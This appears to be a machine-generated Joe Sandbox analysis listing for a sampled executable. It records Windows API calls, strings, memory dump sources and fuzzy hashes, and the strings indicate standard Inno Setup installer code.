                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateFormatMessageQueryValue
                                                                              • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                              • API String ID: 2481121983-1280779767
                                                                              • Opcode ID: 64c03f8d0974fb8baae80ac1f56f66a2074ee7a7d7e2c1940a2ac01f19c1dde8
                                                                              • Instruction ID: cde7545684c4620c2d036396f19d9a4160a162433608d969df8f63117b7f1412
                                                                              • Opcode Fuzzy Hash: 64c03f8d0974fb8baae80ac1f56f66a2074ee7a7d7e2c1940a2ac01f19c1dde8
                                                                              • Instruction Fuzzy Hash: AC81FF75A00209ABDB00DFD5C981BDEB7B9EB49309F50452AF900FB282D7789A45CB69
                                                                              APIs
                                                                                • Part of subcall function 004538BC: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,00496991,_iu,?,00000000,004539F6), ref: 004539AB
                                                                                • Part of subcall function 004538BC: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,00496991,_iu,?,00000000,004539F6), ref: 004539BB
                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0049683D
                                                                              • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00496991), ref: 0049685E
                                                                              • CreateWindowExA.USER32(00000000,STATIC,004969A0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00496885
                                                                              • SetWindowLongA.USER32(?,000000FC,00496018), ref: 00496898
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496964,?,?,000000FC,00496018,00000000,STATIC,004969A0), ref: 004968C8
                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 0049693C
                                                                              • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496964,?,?,000000FC,00496018,00000000), ref: 00496948
                                                                                • Part of subcall function 00453D30: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                              • DestroyWindow.USER32(?,0049696B,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496964,?,?,000000FC,00496018,00000000,STATIC), ref: 0049695E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window$File$CloseCreateHandle$AttributesCopyDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                              • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                              • API String ID: 1549857992-2312673372
                                                                              • Opcode ID: 7b9aa83098eabb2dba0b70aa405a2d9f6b8f1b4b66eab831558cfba939a8a2a9
                                                                              • Instruction ID: 93ed1b954d13302bbccf96d2c338465d3c98789abcf3618d64464ab15fb4d88f
                                                                              • Opcode Fuzzy Hash: 7b9aa83098eabb2dba0b70aa405a2d9f6b8f1b4b66eab831558cfba939a8a2a9
                                                                              • Instruction Fuzzy Hash: 71412C70A04608AEDF00EBA5DC42FAE7BB8EB09714F51457AF400F7291D6799A008B69
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E1C0,00000000), ref: 0042E441
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E447
                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E1C0,00000000), ref: 0042E495
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressCloseHandleModuleProc
                                                                              • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$QaE$kernel32.dll
                                                                              • API String ID: 4190037839-2312295185
                                                                              • Opcode ID: cc4cf932d7b220052410dacf18b487448e6dec6834fb41b85ae1fa26c47c2f69
                                                                              • Instruction ID: f42d7e7755912f49377b3a3c2778cbb45b18f2cdc7334bb7b0fb93ca3fe573dd
                                                                              • Opcode Fuzzy Hash: cc4cf932d7b220052410dacf18b487448e6dec6834fb41b85ae1fa26c47c2f69
                                                                              • Instruction Fuzzy Hash: E8213230B10225BBDB10EAE6DC51B9E76B8EB44308F90447BA504E7281E77CDE419B5C
                                                                              APIs
                                                                              • GetActiveWindow.USER32 ref: 00462870
                                                                              • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462884
                                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462891
                                                                              • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0046289E
                                                                              • GetWindowRect.USER32(?,00000000), ref: 004628EA
                                                                              • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462928
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                              • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                              • API String ID: 2610873146-3407710046
                                                                              • Opcode ID: 963cd5e9bec20ae9785dbab648af90e3917fdde5ac028f1e20745c9c218af8a1
                                                                              • Instruction ID: fe1f68fcdb92d8fdb5b24afc8a588ee1dd3fc27577eab862170fec9bd430383f
                                                                              • Opcode Fuzzy Hash: 963cd5e9bec20ae9785dbab648af90e3917fdde5ac028f1e20745c9c218af8a1
                                                                              • Instruction Fuzzy Hash: 4621C5B5301B056BD301EA648D41F3B3699EBC4714F05052AF944DB3C6E6B8EC048B9A
                                                                              APIs
                                                                              • GetActiveWindow.USER32 ref: 0042F194
                                                                              • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1A8
                                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1B5
                                                                              • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1C2
                                                                              • GetWindowRect.USER32(?,00000000), ref: 0042F20E
                                                                              • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F24C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                              • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                              • API String ID: 2610873146-3407710046
                                                                              • Opcode ID: fe4f6826bb7301b99e83fbe15c42cc49c8205db95b757379d9683ee99bf223cf
                                                                              • Instruction ID: 50a2e38ba83faf67dd7c56e8d7733487d454ef14a416094e89dadcccf0bf0910
                                                                              • Opcode Fuzzy Hash: fe4f6826bb7301b99e83fbe15c42cc49c8205db95b757379d9683ee99bf223cf
                                                                              • Instruction Fuzzy Hash: 3821F279704710ABD300EA68ED41F3B37A9DB89714F88457AF944DB382DA79EC044BA9
                                                                              APIs
                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458C4B,?,00000000,00458CAE,?,?,02343858,00000000), ref: 00458AC9
                                                                              • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02343858,?,00000000,00458BE0,?,00000000,00000001,00000000,00000000,00000000,00458C4B), ref: 00458B26
                                                                              • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02343858,?,00000000,00458BE0,?,00000000,00000001,00000000,00000000,00000000,00458C4B), ref: 00458B33
                                                                              • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458B7F
                                                                              • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458BB9,?,-00000020,0000000C,-00004034,00000014,02343858,?,00000000,00458BE0,?,00000000), ref: 00458BA5
                                                                              • GetLastError.KERNEL32(?,?,00000000,00000001,00458BB9,?,-00000020,0000000C,-00004034,00000014,02343858,?,00000000,00458BE0,?,00000000), ref: 00458BAC
                                                                                • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497F15,00000000), ref: 0045349F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                              • String ID: CreateEvent$TransactNamedPipe
                                                                              • API String ID: 2182916169-3012584893
                                                                              • Opcode ID: 971ff5326f64256da56b2a3a5e971e3af97d4d6353f8bcf162cac826e6801041
                                                                              • Instruction ID: 4e8b515c978fc0f7227371b00e454fc29eb41545a574c41675fd698137751177
                                                                              • Opcode Fuzzy Hash: 971ff5326f64256da56b2a3a5e971e3af97d4d6353f8bcf162cac826e6801041
                                                                              • Instruction Fuzzy Hash: D74185B1A00608AFDB15DF95CD41F9EB7F8FB48715F10406AF900F7292CA78AE44CA68
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456CD1,?,?,00000031,?), ref: 00456B94
                                                                              • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456B9A
                                                                              • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456BE7
                                                                                • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497F15,00000000), ref: 0045349F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                              • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                              • API String ID: 1914119943-2711329623
                                                                              • Opcode ID: ee3ea3d82efd4fb2b54eebd443786074e6cae9edf60e5ac548ea64bc7aca37c1
                                                                              • Instruction ID: 513f35abe53900720ade907ad6bd055a7f67a8f7377afb521354ad4100752fe6
                                                                              • Opcode Fuzzy Hash: ee3ea3d82efd4fb2b54eebd443786074e6cae9edf60e5ac548ea64bc7aca37c1
                                                                              • Instruction Fuzzy Hash: 54319671700604AFDB02EFAACD51D5BB7BDEB8974575284A6BC04D3752DA38DD04C728
                                                                              APIs
                                                                              • RectVisible.GDI32(?,?), ref: 00416E13
                                                                              • SaveDC.GDI32(?), ref: 00416E27
                                                                              • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E4A
                                                                              • RestoreDC.GDI32(?,?), ref: 00416E65
                                                                              • CreateSolidBrush.GDI32(00000000), ref: 00416EE5
                                                                              • FrameRect.USER32(?,?,?), ref: 00416F18
                                                                              • DeleteObject.GDI32(?), ref: 00416F22
                                                                              • CreateSolidBrush.GDI32(00000000), ref: 00416F32
                                                                              • FrameRect.USER32(?,?,?), ref: 00416F65
                                                                              • DeleteObject.GDI32(?), ref: 00416F6F
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                              • String ID:
                                                                              • API String ID: 375863564-0
                                                                              • Opcode ID: 35a16e57ef2060bc5b86dfaf9fb4dd0844c8f61540c1a86612a76d2e62787fd3
                                                                              • Instruction ID: c082a38e55a2621cff38c0036c5e412d4739722926df34ebe37a7eff5f7859fc
                                                                              • Opcode Fuzzy Hash: 35a16e57ef2060bc5b86dfaf9fb4dd0844c8f61540c1a86612a76d2e62787fd3
                                                                              • Instruction Fuzzy Hash: 70515A712086459FDB50EF69C8C4B9B77E8AF48314F15466AFD488B286C738EC81CB99
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                              • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                              • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                              • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                              • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                              • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                              • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                              • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                              • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                              • String ID:
                                                                              • API String ID: 1694776339-0
                                                                              • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                              • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                              • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                              • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                              APIs
                                                                              • GetSystemMenu.USER32(00000000,00000000), ref: 00422233
                                                                              • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422251
                                                                              • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042225E
                                                                              • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226B
                                                                              • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422278
                                                                              • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422285
                                                                              • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00422292
                                                                              • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0042229F
                                                                              • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222BD
                                                                              • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222D9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Delete$EnableItem$System
                                                                              • String ID:
                                                                              • API String ID: 3985193851-0
                                                                              • Opcode ID: d8fcfd45993f68361b05288e300d90e061abaf0c01acb012dac33f8cfd749464
                                                                              • Instruction ID: 662ae76830c3dbb110fd6952920e185112f137d20e740dc0dcce1beff7d7cd05
                                                                              • Opcode Fuzzy Hash: d8fcfd45993f68361b05288e300d90e061abaf0c01acb012dac33f8cfd749464
                                                                              • Instruction Fuzzy Hash: AF2144703407047AE720E724CD8BF9BBBD89B04708F5451A5BA487F6D3C6F9AB804698
                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(10000000), ref: 004814F5
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00481509
                                                                              • SendNotifyMessageA.USER32(0002042A,00000496,00002710,00000000), ref: 0048157B
                                                                              Strings
                                                                              • DeinitializeSetup, xrefs: 004813F1
                                                                              • Restarting Windows., xrefs: 00481556
                                                                              • GetCustomSetupExitCode, xrefs: 00481395
                                                                              • Deinitializing Setup., xrefs: 00481356
                                                                              • Not restarting Windows because Setup is being run from the debugger., xrefs: 0048152A
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary$MessageNotifySend
                                                                              • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                              • API String ID: 3817813901-1884538726
                                                                              • Opcode ID: 7fd84dd053b4401f5bdf0ca771466cc8f90a001c2e291a6a881faa6dba982769
                                                                              • Instruction ID: a147a64e5fa7f59d2c1c0707bc10c89f769f7b05bbdcd0d826f9af474dd6dcab
                                                                              • Opcode Fuzzy Hash: 7fd84dd053b4401f5bdf0ca771466cc8f90a001c2e291a6a881faa6dba982769
                                                                              • Instruction Fuzzy Hash: 55519F30700240AFD311EB69E8D5B6E7BA8EB59714F50887BE805C73B1DB38AC46CB59
                                                                              APIs
                                                                              • SHGetMalloc.SHELL32(?), ref: 0046153B
                                                                              • GetActiveWindow.USER32 ref: 0046159F
                                                                              • CoInitialize.OLE32(00000000), ref: 004615B3
                                                                              • SHBrowseForFolder.SHELL32(?), ref: 004615CA
                                                                              • CoUninitialize.OLE32(0046160B,00000000,?,?,?,?,?,00000000,0046168F), ref: 004615DF
                                                                              • SetActiveWindow.USER32(?,0046160B,00000000,?,?,?,?,?,00000000,0046168F), ref: 004615F5
                                                                              • SetActiveWindow.USER32(?,?,0046160B,00000000,?,?,?,?,?,00000000,0046168F), ref: 004615FE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                                              • String ID: A
                                                                              • API String ID: 2684663990-3554254475
                                                                              • Opcode ID: 703f1963e0dc72a1c395d9026068ceb343fdf60ef3171849bb259b064323ba87
                                                                              • Instruction ID: 8a944d3e7b26c7d839f1ecf9cf32de2b38f87d5f920ef02beae42f78277bfb86
                                                                              • Opcode Fuzzy Hash: 703f1963e0dc72a1c395d9026068ceb343fdf60ef3171849bb259b064323ba87
                                                                              • Instruction Fuzzy Hash: 62312D70E00358AFDB00EFA6D885A9EBBF8EB09304F55847AF405E7251E7789A048B59
                                                                              APIs
                                                                              • GetFileAttributesA.KERNEL32(00000000,00000000,0047292D,?,?,?,00000008,00000000,00000000,00000000,?,00472B89,?,?,00000000,00472DF8), ref: 00472890
                                                                                • Part of subcall function 0042CD94: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE0A
                                                                                • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,00498261,00000000,004982B6,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                              • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,0047292D,?,?,?,00000008,00000000,00000000,00000000,?,00472B89), ref: 00472907
                                                                              • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0047292D,?,?,?,00000008,00000000,00000000,00000000), ref: 0047290D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                              • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                              • API String ID: 884541143-1710247218
                                                                              • Opcode ID: 8c120786a4ea8c92214831f90170699f67ddada7000dc7cca521b0e92e4fa8e9
                                                                              • Instruction ID: c9f0bcdda41dfe4bc4fb8c2ad9af4abf79d42ba832169be77a83c6f088ccd444
